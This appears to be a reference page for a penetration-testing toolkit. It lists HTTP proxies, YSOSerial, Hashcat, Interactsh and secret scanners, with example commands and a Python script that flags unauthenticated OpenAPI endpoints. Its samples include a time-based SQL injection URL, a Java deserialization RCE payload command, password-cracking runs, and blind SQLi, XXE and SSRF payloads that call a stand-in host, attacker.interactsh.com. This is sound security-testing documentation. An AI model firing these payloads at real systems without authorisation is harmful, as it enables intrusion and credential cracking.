
Exploitation & Testing Tools

HTTP Clients & Proxies

cURL

Standard: Linux/macOS/Windows
Purpose: Core HTTP client for PoC execution

# Basic request
curl -X POST https://api.example.com/api/v1/users \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email":"test@example.com","role":"admin"}'

# With timing
curl -w "Response time: %{time_total}s\n" \
  "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5)"

Advantages:
- ✅ Universal (available everywhere)
- ✅ Scriptable
- ✅ Supports all HTTP methods
- ✅ Cookie/header management


HTTPie

GitHub: httpie/httpie
Purpose: User-friendly HTTP client

More readable than cURL for manual testing.

http POST https://api.example.com/api/v1/users \
  Authorization:"Bearer TOKEN" \
  email=test@example.com \
  role=admin

Advantages:
- ✅ Syntax closer to natural HTTP
- ✅ Better formatting
- ✅ Color-coded output
- ✅ JSON auto-detection


Burp Suite Pro

GitHub: PortSwigger
Purpose: Industry-standard web proxy and testing suite

Manual testing, request modification, and interception.

Features:
- Proxy interception
- Repeater (modify and resend requests)
- Intruder (automated fuzzing)
- Scanner (automated vulnerability detection)
- Burp AI Agent (AI-powered testing with 53 MCP tools)

Integration: BeDefended uses Burp as proxy via --proxy flag

/pentest https://api.example.com --proxy 127.0.0.1:8080

Caido

GitHub: caido
Purpose: Modern alternative to Burp, faster and lighter

Web proxy with modern UI.

Features:
- Fast proxy
- Request replay
- Parameter extraction
- 47 CLI commands

Integration: Similar to Burp proxy integration


Exploitation Tools

YSOSerial

GitHub: frohoff/ysoserial
Purpose: Java deserialization gadget chain generator

Generate malicious serialized objects for Java RCE.

docker run --rm -v $(pwd):/work pentest-tools \
  java -jar /opt/ysoserial/ysoserial.jar \
  CommonsCollections5 'touch /tmp/pwned' \
  | base64

Gadget Chains:
- CommonsCollections (all versions)
- Spring Framework
- Rome library
- JNDI injection payloads

Output: Base64-encoded serialized object for exploitation


Hashcat

GitHub: hashcat/hashcat
Purpose: GPU-accelerated password cracking

Crack hashes using dictionary, brute-force, and rule-based attacks.

docker run --rm -v $(pwd):/work pentest-tools \
  hashcat -m 0 -a 0 \
  hashes.txt \
  wordlist.txt \
  --force

Modes:
- -m 0: MD5
- -m 1400: SHA-256
- -m 3200: bcrypt
- -m 13100: PBKDF2-SHA256

Speed: over a billion hashes per second on GPU


Crunch

GitHub: crunch (various implementations)
Purpose: Wordlist generator

Generate custom wordlists based on patterns.

docker run --rm -v $(pwd):/work pentest-tools \
  crunch 8 8 -t "admin@@@" -o wordlist.txt

Pattern Options:
- @ : lowercase letter
- , : uppercase letter
- % : digit
- ^ : special character


Interactsh (Out-of-Band Testing)

Interactsh Client

GitHub: projectdiscovery/interactsh
Purpose: Detect SSRF, blind XXE, and blind SQLi using out-of-band channels

Generate unique interaction endpoints for detecting hidden vulnerabilities.

docker run --rm -v $(pwd):/work pentest-tools \
  interactsh-client -poll

Use Cases:
1. Blind SQLi Detection: SELECT LOAD_FILE('\\\\attacker.interactsh.com\\share')
2. Blind XXE: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.interactsh.com/xxe">]>
3. SSRF Verification: curl http://attacker.interactsh.com/ssrf
4. CNAME Records: Create CNAME→Interactsh for DNS rebinding

Output:

Listening for interactions...
Interaction #1
  Type: HTTP
  URL: http://abc123.interactsh.com
  Method: GET
  User-Agent: curl/7.64.1


Scanning & Testing Frameworks

Testssl.sh

GitHub: drwetter/testssl.sh
Purpose: TLS/SSL configuration scanner

Comprehensive SSL/TLS testing.

docker run --rm -v $(pwd):/work pentest-tools \
  testssl.sh --full https://example.com

Checks:
- Protocol versions (SSLv2, SSLv3, TLS 1.0, 1.1, 1.2, 1.3)
- Cipher suites
- Key exchange strength
- Certificate validation
- HSTS, OCSP stapling, etc.


Secret Management

Trufflehog

GitHub: trufflesecurity/trufflehog
Purpose: Detect secrets in code repositories

Scans git history and files for credentials.

docker run --rm -v $(pwd):/work pentest-tools \
  trufflehog filesystem /work/source-code

Detects:
- API keys (GitHub, AWS, Stripe, etc.)
- Private keys (SSH, PGP)
- Database credentials
- OAuth tokens


GitLeaks

GitHub: gitleaks/gitleaks
Purpose: Git secret scanning

Scans git repositories for secrets.

docker run --rm -v $(pwd):/work pentest-tools \
  gitleaks detect --source /work/repo --verbose

API Testing

Swagger/OpenAPI Validation

Tool: Integrated into discovery phase
Purpose: Validate API specifications

Some apps expose /swagger.json or /openapi.json, which lists every endpoint the API serves.

curl https://api.example.com/swagger.json | jq '.paths | keys'
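Going one step beyond listing path keys, this added example (not part of BeDefended or the original page) parses an OpenAPI 3 document and reports which operations declare no security requirement, so unauthenticated endpoints stand out during spec review. The spec is a constructed sample embedded inline; in practice you would feed it the body fetched by the curl command above.

```python
"""Enumerate operations from an OpenAPI 3 document and flag those with no
declared authentication. Added example for this page; the spec below is
constructed, not a real API."""
import json

HTTP_METHODS = ("get", "put", "post", "delete", "options", "head", "patch", "trace")

# Constructed sample spec: a document-level security requirement, one operation
# restating it, and two operations opting out with an empty security list.
SAMPLE_SPEC = json.dumps({
    "openapi": "3.0.3",
    "security": [{"bearerAuth": []}],
    "components": {"securitySchemes": {"bearerAuth": {"type": "http", "scheme": "bearer"}}},
    "paths": {
        "/api/v1/users": {
            "get": {"summary": "List users"},
            "post": {"summary": "Create user", "security": [{"bearerAuth": []}]},
        },
        "/api/v1/health": {"get": {"summary": "Health check", "security": []}},
        "/api/v1/admin/export": {"get": {"summary": "Export all data", "security": []}},
    },
})


def list_operations(spec_text):
    """Return (METHOD, path, requires_auth) for every operation in the spec.

    Per the OpenAPI spec, an operation's own 'security' overrides the
    document-level default, and an explicit empty list means the operation
    is intentionally reachable without authentication.
    """
    spec = json.loads(spec_text)
    global_security = spec.get("security", [])
    ops = []
    for path, item in sorted(spec.get("paths", {}).items()):
        for method in HTTP_METHODS:
            if method not in item:
                continue
            security = item[method].get("security", global_security)
            ops.append((method.upper(), path, bool(security)))
    return ops


def unauthenticated(spec_text):
    """(METHOD, path) pairs that no security scheme protects; review each one."""
    return [(m, p) for m, p, auth in list_operations(spec_text) if not auth]


if __name__ == "__main__":
    for method, path, auth in list_operations(SAMPLE_SPEC):
        print(f"{method:6} {path:25} {'auth' if auth else 'NO AUTH'}")
```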

Summary Table

Tool         Purpose                 Use Case
-----------  ----------------------  ---------------------------------
cURL         HTTP client             Every PoC
HTTPie       Friendly HTTP client    Manual testing
Burp Suite   Web proxy + testing     Comprehensive testing
Caido        Modern web proxy        Fast proxy work
YSOSerial    Java RCE payload gen    Deserialization RCE
Hashcat      Password cracking       Hash cracking
Interactsh   OOB detection           Blind vulnerability verification
Testssl.sh   SSL/TLS testing         Certificate/cipher analysis
Trufflehog   Secret scanning         Source code secret detection
GitLeaks     Git secret scanning     Repository secret detection